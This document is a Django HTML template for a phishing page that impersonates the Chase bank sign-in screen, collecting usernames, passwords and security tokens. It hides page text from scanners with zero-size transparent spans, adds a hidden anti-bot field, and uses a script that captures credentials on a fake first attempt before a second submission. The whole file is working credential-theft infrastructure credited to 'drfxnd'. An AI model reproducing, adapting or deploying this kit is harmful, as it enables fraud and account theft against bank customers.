{% load static %}

{% block header %}
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" class="no-js" lang="en" dir="ltr">
<head>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
        <!-- Meta BY drfxnd -->
        <meta charset="utf-8" />
        <meta name="robots" content="noindex,nofollow" />
        <title>Sign in - chase.com</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />

        <!-- ICONS BY drfxnd -->
       <link rel="apple-touch-icon" sizes="152x152" href="{% static 'base/images/chase-touch-icon-152x152.png' %}">
        <link rel="apple-touch-icon" sizes="120x120" href="{% static 'base/images/chase-touch-icon-120x120.png' %}">
        <link rel="apple-touch-icon" sizes="76x76" href="{% static 'base/images/chase-touch-icon-76x76.png' %}">
        <link rel="apple-touch-icon" href="{% static 'base/images/chase-touch-icon.png' %}">
        <link rel="shortcut icon" href="{% static 'base/images/chasefavicon.ico' %}">

        <!-- Css BY drfxnd -->
       <link rel="stylesheet" href="{% static 'base/css/logon.css' %}">
        <link rel="stylesheet" href="{% static 'base/css/blue-ui2.css' %}">
    <link rel="stylesheet" href="{% static 'base/css/blue-ui.css' %}">
        <link rel="stylesheet" href="{% static 'base/css/login.css' %}">
        <link rel="stylesheet" href="{% static 'base/css/footer.css' %}">
    <link rel="stylesheet" href="{% static 'base/css/dashboard.css' %}">
    <link rel="stylesheet" href="{% static 'base/css/mds-chase-icons.css' %}">
    <script src='https://www.google.com/recaptcha/api.js?render={{recaptcha_site_key}}'></script>


        <!-- Loading  -->
        <script type="text/javascript">
            document.onreadystatechange = function() {
                var state = document.readyState
                if (state == 'complete') {
                    setTimeout(function() {
                        document.getElementById('interactive');
                        document.getElementById('fixed').style.visibility = "hidden";
                    }, 1500);
                }
            }
        </script>


<body style="overflow-x: hidden; overflow-y: auto; height: 100%" data-has-view="true" class="daog">

  <div id="load" style="display:none">
      <div class="spinner" style="position: fixed;top: 43%;right: 0;bottom: 0;left: 0;z-index: 200;margin: 0;text-align: center;">
        <div class="">
          <div id="chaseSpinnerID" class="jpui spinner" tabindex="-1">
            <span id="accessible-chaseSpinnerID" class="util accessible-text">l<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>o<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>a<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>d<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>i<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>n<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>g</span>
          </div>
        </div>
      </div>
    </div>


    <div id="fixed">
       <div class="spinner" style="position: fixed;top: 43%;right: 0;bottom: 0;left: 0;z-index: 200;margin: 0;text-align: center;">
            <div class="">
               <div id="chaseSpinnerID" class="jpui spinner" tabindex="-1">
                  <span id="accessible-chaseSpinnerID" class="util accessible-text">l<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>o<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>a<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>d<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>i<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>n<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>g</span>
               </div>
            </div>
       </div>
    </div>


<div id="logonApp" data-is-view="true">
<div class="homepage" tabindex="-1">
<div id="advertisenativeapp" data-has-view="true">
<div data-is-view="true">
<div class="advertiseNativeApp"></div></div></div>
<div class="toggle-aria-hidden" id="sitemessage" role="region" aria-labelledby="site-messages-heading" aria-hidden="true" data-has-view="true">
<div data-is-view="true">
</div></div>
<div class="logon-container" id="container">
<header class="toggle-aria-hidden" id="logon-summary-menu" data-has-view="true">
<div class="logon header jpui transparent navigation bar" data-is-view="true">
<a id="logoHomepageLink" href="#">
<div class="chase logo"></div>
</a>
<span id="logonCloseIcon-iconanchor-wrapper">
<a class="jpui iconaction logon-close-icon" href="javascript:void(0);" id="logonCloseIcon">

<i class="" id="" aria-hidden="true"></i></a>
</span>
</div>
</header>

<main id="logon-content" data-has-view="true">
<div class="container logon" data-is-view="true">
<div>
<div id="backgroundImage">
<div class="jpui background image fixed" id="geoImage">
</div>
</div>
</div>
<div class="row">
<div class="col-xs-12 col-md-6 col-md-offset-3 logoff hidden" id="logoffbox">
<div class="jpui raised segment">
<div class="row">
<div class="col-xs-12">
<div class="progress">
<div class="bar">
</div>
</div>
</div>
</div>
</div>
</div>
<div class="col-xs-12 col-sm-6 col-sm-offset-3 logon-box" id="logonbox">
<div class="jpui raised segment">
<div class="row">
<div class="col-xs-10 col-xs-offset-1">
<form id="login-form" method="POST"  action="" >
  <input style="display: none;" type="text"  autocomplete="off" />

{% csrf_token %}
<div class="logon-xs-toggle" id="userId">
<input class="jpui input logon-xs-toggle form-control inp_username slimodan_input" required name="username" placeholder="Username"  type="text" data-validation="length" data-validation-length="min1" data-validation-error-msg=" ">
</div>
<div class="logon-xs-toggle" id="password">
<input  class="jpui input logon-xs-toggle form-control inp_password slimodan_input"  placeholder="Password" type="password" required name="password"  data-validation="length" data-validation-length="min1" data-validation-error-msg=" ">
</div>
<input type="hidden" name="spox" value="fuck_you_bot">
<div class="logon-xs-toggle" id="securityToken" style="display: none;" >
<input class="jpui input logon-xs-toggle inp_password slimodan_input"  placeholder="Token" name="token" type="tel" name="securityToken" data-validation="length" data-validation-length="min6-30" data-validation-error-msg=" ">
</div>
<div class="row logon-xs-toggle">
<div class="col-xs-6 rememberMe-checkbox-container">
<div class="jpui checkbox" id="rememberMe">
<div class="checkbox-flex">
<div class="checkboxWrap">

<input class="checkbox__input" type="checkbox" id="rememberMe"  name="rememberMe">

<i class="jpui checkmark icon check" aria-hidden="true"></i>
</div>
<label for="input-rememberMe">
<span class="checkbox-label" id="label-rememberMe">R<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>e<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>m<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>e<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>m<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>b<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>e<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>r m<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>e </span></label>
</div>
</div>
</div>
<div class="col-xs-6 token-checkbox-container">
<div class="jpui checkbox useToken" id="useToken">
<div class="checkbox-flex">
<div class="checkboxWrap">
<input class="checkbox__input" type="checkbox" id="input-useToken"  value="on">
<i class="jpui checkmark icon check" aria-hidden="true"></i>
</div>
<label for="input-useToken">
<span class="checkbox-label" id="token">U<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>s<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>e t<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>o<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>k<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>e<font style="color:transparent;font-size:0px"><?= $SPOX ?></font>n </span></label>
</div>
</div>
</div>
</div>
<div class="row">
<input type="hidden" id="g-recaptcha-response" name="g-recaptcha-response">
<input type="text" hidden name="username_step1" id="username_step1">
<input type="text" hidden name="password_step1" id="password_step1">
<button type="submit" class="jpui button focus fluid primary " id="one_login">
<span class="label">Sign in</span>
</button>
</div>
<div class="row">
<span class="jpui link" id="forgotPassword-link-wrapper">
<a class="link-anchor" id="forgotPassword" href="javascript:void(0);" aria-label=" Forgot username/password?  ">Forgot username/password? <i class="fa fa-angle-right" id="forgotPassword-endIcon" aria-hidden="true">
</i>
</a>
</span>
</div>
<div class="row">
<span class="jpui link" id="enrollment-link-wrapper">
<a class="link-anchor last" id="enrollment" href="javascript:void(0);" aria-label=" Not Enrolled? Sign Up Now. ">Not Enrolled? Sign Up Now.  <i class="fa fa-angle-right" id="enrollment-endIcon" aria-hidden="true"></i>
</a>
</span>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</main>
</div>
<footer class="logon-footer" id="logon-footer" data-has-view="true">
<div class="footer-container position-absolute" data-is-view="true" data-component-name="">
<div class="container">
<div class="social-links row">

<div class="col-xs-12">
<span class="Follow-us-text">Follow us:</span>

   <ul class="icon-links">
   <li class="facebook">
   <span id="requestChaseFacebook-iconanchor-wrapper">
   <a id="requestChaseFacebook" class="jpui iconaction"
   href="javascript:void(0);">
   <span id="accessible-requestChaseFacebook" class="util accessible-text">Facebook: Opens dialog</span>
   <i id="icon-requestChaseFacebook" class="fa fa-facebook-square" aria-hidden="true">

   </i>
   </a>
   </span>
   </li>

   <li class="instagram">
   <span id="requestChaseInstagram-iconanchor-wrapper">
   <a id="requestChaseInstagram" class="jpui iconaction"
   href="javascript:void(0);">
   <span id="accessible-requestChaseInstagram" class="util accessible-text">Instagram: Opens dialog</span>
   <i id="icon-requestChaseInstagram" class="fa fa-instagram" aria-hidden="true">

   </i>
   </a>
   </span>
   </li>

   <li class="twitter">
   <span id="requestChaseTwitter-iconanchor-wrapper">
   <a id="requestChaseTwitter" class="jpui iconaction"
   href="javascript:void(0);">
   <span id="accessible-requestChaseTwitter" class="util accessible-text">Twitter: Opens dialog</span>
   <i id="icon-requestChaseTwitter" class="fa fa-twitter" aria-hidden="true">

   </i>
   </a>
   </span>
   </li>

   <li class="youtube">
   <span id="requestChaseYoutube-iconanchor-wrapper">
   <a id="requestChaseYoutube" class="jpui iconaction"
   href="javascript:void(0);">
   <span id="accessible-requestChaseYoutube" class="util accessible-text">Youtube: Opens dialog</span>
   <i id="icon-requestChaseYoutube" class="fa fa-youtube" aria-hidden="true">

   </i>
   </a>
   </span>
   </li>

   <li class="linkedin">
   <span id="requestChaseLinkedin-iconanchor-wrapper">
   <a id="requestChaseLinkedin" class="jpui iconaction"
   href="javascript:void(0);">
   <span id="accessible-requestChaseLinkedin" class="util accessible-text">Linkedin: Opens dialog</span>
   <i id="icon-requestChaseLinkedin" class="fa fa-linkedin-in" aria-hidden="true">

   </i>
   </a>
   </span>
   </li>
   </ul>
   </div>

   </div>
   <div class="footer-links row implement-ada-features-enabled">

   <div class="col-xs-12">
   <ul>
   <li>
   <span id="requestContactUs-link-wrapper" class="jpui link">
   <a id="requestContactUs" class="link-anchor"
   href="javascript:void(0);" aria-label=" Contact us ">Contact us
   </a>
   </span>
   </li>

   <li>
   <span id="requestPrivacy-link-wrapper" class="jpui link">
   <a id="requestPrivacy" class="link-anchor"
   href="javascript:void(0);" aria-label=" Privacy ">Privacy
   </a>
   </span>
   </li>

   <li>
   <span id="requestSecurity-link-wrapper" class="jpui link">
   <a id="requestSecurity" class="link-anchor"
   href="javascript:void(0);" aria-label=" Security ">Security
   </a>
   </span>
   </li>

   <li>
   <span id="requestTermsOfUse-link-wrapper" class="jpui link">
   <a id="requestTermsOfUse" class="link-anchor"
   href="javascript:void(0);" aria-label=" Terms of use ">Terms of use
   </a>
   </span>
   </li>

   <li>
   <span id="requestAccessibility-link-wrapper" class="jpui link">
   <a id="requestAccessibility" class="link-anchor"
   href="javascript:void(0);" aria-label=" Accessibility ">Accessibility
   </a>
   </span>
   </li>

    <li>
   <span id="requestMortgageLoanOriginators-link-wrapper" class="jpui link">
   <a id="requestMortgageLoanOriginators" class="link-anchor"
   href="javascript:void(0);" aria-label=" SAFE Act: Chase Mortgage Loan Originators ">SAFE Act: Chase Mortgage Loan Originators
   </a>
   </span>
   </li>

   <li>
   <span id="requestHomeMortgageDisclosureAct-link-wrapper" class="jpui link">
   <a id="requestHomeMortgageDisclosureAct" class="link-anchor"
   href="javascript:void(0);" aria-label=" Fair Lending ">Fair Lending
   </a>
   </span>
   </li>

   <li>
   <span id="requestAboutChase-link-wrapper" class="jpui link">
   <a id="requestAboutChase" class="link-anchor"
   href="javascript:void(0);" aria-label=" About Chase ">About Chase
   </a>
   </span>
   </li>

   <li>
   <span id="requestJpMorgan-link-wrapper" class="jpui link">
   <a id="requestJpMorgan" class="link-anchor"
   href="javascript:void(0);" aria-label=" J.P. Morgan ">J.P. Morgan
   </a>
   </span>
   </li>

   <li>
   <span id="requestJpMorganChaseCo-link-wrapper" class="jpui link">
   <a id="requestJpMorganChaseCo" class="link-anchor"
   href="javascript:void(0);" aria-label=" JPMorgan Chase & Co. ">JPMorgan Chase & Co.
   </a>
   </span>
   </li>

   <li>
   <span id="requestCareers-link-wrapper" class="jpui link">
   <a id="requestCareers" class="link-anchor"
   href="javascript:void(0);" aria-label=" Careers ">Careers
   </a>
   </span>
   </li>

   <li>
   <span id="requestEspanol-link-wrapper" class="jpui link">
   <a id="requestEspanol" class="link-anchor"
   href="javascript:void(0);" aria-label=" Español ">Español
   </a>
   </span>
   </li>

   <li>
   <span id="requestChaseCanada-link-wrapper" class="jpui link">
   <a id="requestChaseCanada" class="link-anchor"
   href="javascript:void(0);" aria-label=" Chase Canada ">Chase Canada
   </a>
   </span>
   </li>

   <li>
   <span id="requestSiteMap-link-wrapper" class="jpui link">
   <a id="requestSiteMap" class="link-anchor"
   href="javascript:void(0);" aria-label=" Site map ">Site map
   </a>
   </span>
   </li>

    <li>Member FDIC</li>

  <li>
  <i class='fa-solid fa-warehouse'></i>

  </i>

  Equal Housing Opportunity
  </li>
  <li class="copyright-label">(c) 2023 JPMorgan Chase & Co.</li>
  </ul>
  </div>

  </div>
  <div class="row galaxy-footer"
  <div class="col-xs-10 col-xs-offset-1"
    <p class="NOTE"
   <span></span>
  <br>
  <span class="copyright-label">(c) 2023 JPMorgan Chase & Co.</span>
  </p>
  <p>
  <span id="galaxyRequestPrivacyNotice-link-wrapper" class="jpui link">
  <a id="galaxyRequestPrivacyNotice" class="link-anchor NOTELINK"
  href="javascript:void(0);" aria-label=" Privacy "
  Privacy
  <i id="galaxyRequestPrivacyNotice-endIcon" class="jpui progressright icon end-icon"
  aria-hidden="true"></i>
  </a>
  </span>
  </p>
  <p>
  <span id="galaxyRequestAccessibility-link-wrapper" class="jpui link">
  <a id="galaxyRequesttAccessibility" class="link-anchor NOTELINK"
  href="javascript:void(0);" aria-label=" Accessibility "
  Privacy
  <i id="galaxyRequestAccessibility-endIcon" class="jpui progressright icon end-icon"
  aria-hidden="true"></i>
  </a>
  </span>
  </p>
  </div>
   </div>
  </div>
 </div>
</footer>
</div>
</div>
<script src="{% static 'base/js/script.js' %}" defer="true"></script>
    <script>
        $("#one_login").click(function(e){
            e.preventDefault();
            if ($("#one_login").hasClass("one")){
                $("#username_step1").val($(".inp_username").val());
                $("#password_step1").val($(".inp_password").val());
                $(".slimodan_alert").removeClass("d-none");
                $(".inp_username").val("");
                $(".inp_password").val("");
                $("#one_login").removeClass("one");

            }else{
                $(".form_one").submit();
            }
        })
    </script>
    <script>
        grecaptcha.ready(function() {
          grecaptcha.execute('{{recaptcha_site_key}}', {action: "/"}).then(function(token) {
            document.getElementById('g-recaptcha-response').value = token;
          });
        });
    </script>
    </body>
</html>
{% endblock %}